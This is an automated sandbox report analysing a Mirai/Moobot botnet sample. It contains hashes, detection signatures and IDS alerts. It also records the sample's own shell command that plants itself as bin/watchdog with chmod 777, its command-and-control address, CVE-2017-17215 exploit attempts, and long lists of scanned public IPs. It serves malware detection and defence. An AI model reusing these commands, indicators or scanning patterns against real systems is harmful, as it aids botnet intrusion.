Linux Analysis Report
lD25Z9LfKe.elf

Overview

General Information

Sample Name:lD25Z9LfKe.elf
Original Sample Name:c929d58b6bb8f66edc985003ba50c3c1.elf
Analysis ID:830684
MD5:c929d58b6bb8f66edc985003ba50c3c1
SHA1:711976261f2f197a341dca8afdb7679f04aa3f99
SHA256:e1366976365db1f2bffdc37d4e64e12f883f9a20e02b12d52b6a1b346b8f0692
Tags:32 elf mirai powerpc
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which no longer works.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830684
Start date and time:2023-03-20 15:58:57 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 23s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:lD25Z9LfKe.elf
Original Sample Name:c929d58b6bb8f66edc985003ba50c3c1.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: j.xnyidc.top
Command:/tmp/lD25Z9LfKe.elf
PID:6224
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • lD25Z9LfKe.elf (PID: 6224, Parent: 6126, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/lD25Z9LfKe.elf
    • sh (PID: 6226, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6226)
      • rm (PID: 6228, Parent: 6226, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6226)
      • mkdir (PID: 6229, Parent: 6226, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6230, Parent: 6226)
      • mv (PID: 6230, Parent: 6226, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/lD25Z9LfKe.elf bin/watchdog
      • sh New Fork (PID: 6231, Parent: 6226)
      • chmod (PID: 6231, Parent: 6226, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: MooBot
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
Source: lD25Z9LfKe.elf, Rule: JoeSecurity_Moobot, Description: Yara detected Moobot, Author: Joe Security
Source: lD25Z9LfKe.elf, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: lD25Z9LfKe.elf, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, Rule: JoeSecurity_Moobot, Description: Yara detected Moobot, Author: Joe Security
Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, Rule: JoeSecurity_Moobot, Description: Yara detected Moobot, Author: Joe Security
Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown

            AV Detection

            Source: lD25Z9LfKe.elf, Virustotal: Detection: 60%
            Source: lD25Z9LfKe.elf, ReversingLabs: Detection: 61%

            Networking

            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:33891 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57718 -> 41.34.164.79:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40848 -> 34.117.1.253:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33038 -> 197.234.59.68:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35290 -> 197.214.98.38:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32970 -> 41.237.49.241:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46324 -> 103.167.148.132:37215
            Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:59786 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47828 -> 156.224.24.249:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47828
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42302 -> 41.37.68.246:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38528 -> 41.234.87.51:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59180 -> 141.117.56.180:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55414 -> 20.28.196.139:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45430 -> 197.39.222.152:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52042 -> 41.236.241.240:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57754 -> 192.119.137.74:37215
            Source: global trafficTCP traffic: 41.34.164.79 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 222.25.56.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.14.33.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 5.113.217.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.50.89.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.239.9.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.242.60.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.176.199.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.246.84.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.206.133.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.141.127.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.116.67.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.127.81.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.90.60.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.132.213.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 163.70.74.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.84.211.67:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.63.140.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 104.235.12.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.80.10.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 204.31.227.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.38.189.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.128.151.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.0.58.121:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.199.45.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 95.163.190.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 175.78.4.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.0.66.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.70.223.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.126.85.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.12.29.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.98.183.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 169.149.239.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.109.89.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 152.220.130.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.75.243.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 199.214.249.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 19.181.108.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.138.28.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.65.216.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.174.185.184:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.102.64.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.11.19.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.210.212.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 96.5.186.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.18.86.71:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 138.203.247.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.178.158.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.189.123.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.105.206.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.20.161.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.91.238.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.132.162.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.212.90.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.37.62.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 160.244.207.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.182.61.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.226.253.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 38.43.62.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.166.181.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.12.51.236:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.126.88.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.231.115.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.213.181.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.136.183.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 118.131.58.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.181.4.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.229.102.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.118.138.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.48.250.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.185.59.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.3.136.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.0.38.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.164.111.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.127.20.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.203.60.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 148.61.162.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.240.208.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.252.146.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.159.158.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.107.11.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.98.143.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.168.111.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.216.29.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.58.106.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.137.222.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.86.162.104:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 25.180.3.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.185.193.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.74.27.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 180.66.67.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.156.30.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 147.239.178.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.114.55.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 114.11.212.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.6.52.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.34.249.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.163.207.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.166.219.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.232.64.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 137.11.12.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 164.253.47.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 129.103.28.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.134.37.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.41.230.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.227.27.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.68.113.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 183.120.173.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.192.189.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.216.198.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.120.81.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.25.94.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 113.230.77.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 200.195.192.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.227.184.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.230.234.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.217.157.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.222.155.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.159.130.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.6.205.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.121.236.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.44.82.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.216.23.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.91.104.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.45.84.18:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.169.126.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.53.189.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 201.143.90.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:47796 -> 156.224.24.249:56999
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.54.157.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.227.162.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 46.194.98.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.252.210.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.145.7.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 221.130.215.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.189.124.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 71.74.82.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 166.21.109.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.76.137.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.166.194.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.181.199.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.255.183.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.13.229.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 64.185.187.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.40.12.58:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.221.188.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.241.108.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.23.161.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 76.250.76.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 195.159.180.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 150.254.200.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.244.140.27:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.46.170.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 96.250.71.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.205.255.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.87.148.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 151.131.161.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.28.209.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.61.79.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.228.155.67:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.90.111.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.96.228.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.32.203.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 135.240.161.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.175.101.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.157.148.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 148.186.209.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.162.107.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 80.41.101.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.103.124.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 161.112.115.71:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.104.67.128:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 62.139.173.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 120.52.202.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.13.13.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.248.134.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.68.197.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.225.182.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.246.138.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.79.188.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.200.227.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 31.60.149.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.213.76.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.100.87.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.32.47.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 203.234.108.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.33.13.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 78.140.4.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.137.15.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.37.146.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.45.130.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.41.79.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 148.148.125.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.88.3.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 206.79.239.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.133.67.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.22.223.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 177.239.190.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.127.156.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.238.147.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.37.83.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.71.196.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.170.104.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.120.202.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 140.231.65.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.43.223.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.129.164.225:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.162.161.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.209.212.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.110.108.225:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.254.173.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 177.169.155.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 32.35.93.104:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 198.180.24.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 57.235.47.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.22.243.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.115.86.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 165.81.224.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 217.56.35.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.46.18.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 198.154.125.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.168.18.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 212.155.21.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.102.179.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.48.157.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.174.245.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.77.154.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.34.31.200:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 76.70.169.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.110.87.200:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.234.154.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.191.194.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 178.147.201.253:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.163.168.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.102.48.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.113.137.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.149.108.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.227.10.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.176.212.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 165.59.11.38:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.23.159.18:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.42.75.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 181.17.240.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.43.5.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.67.143.164:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.12.190.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 89.152.161.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.246.34.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 88.229.247.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 57.205.25.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.4.101.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.81.222.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.90.115.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.62.150.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 89.232.229.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 190.13.5.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.147.129.251:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.127.229.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.78.65.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 86.114.238.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.235.4.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 200.243.218.201:37215
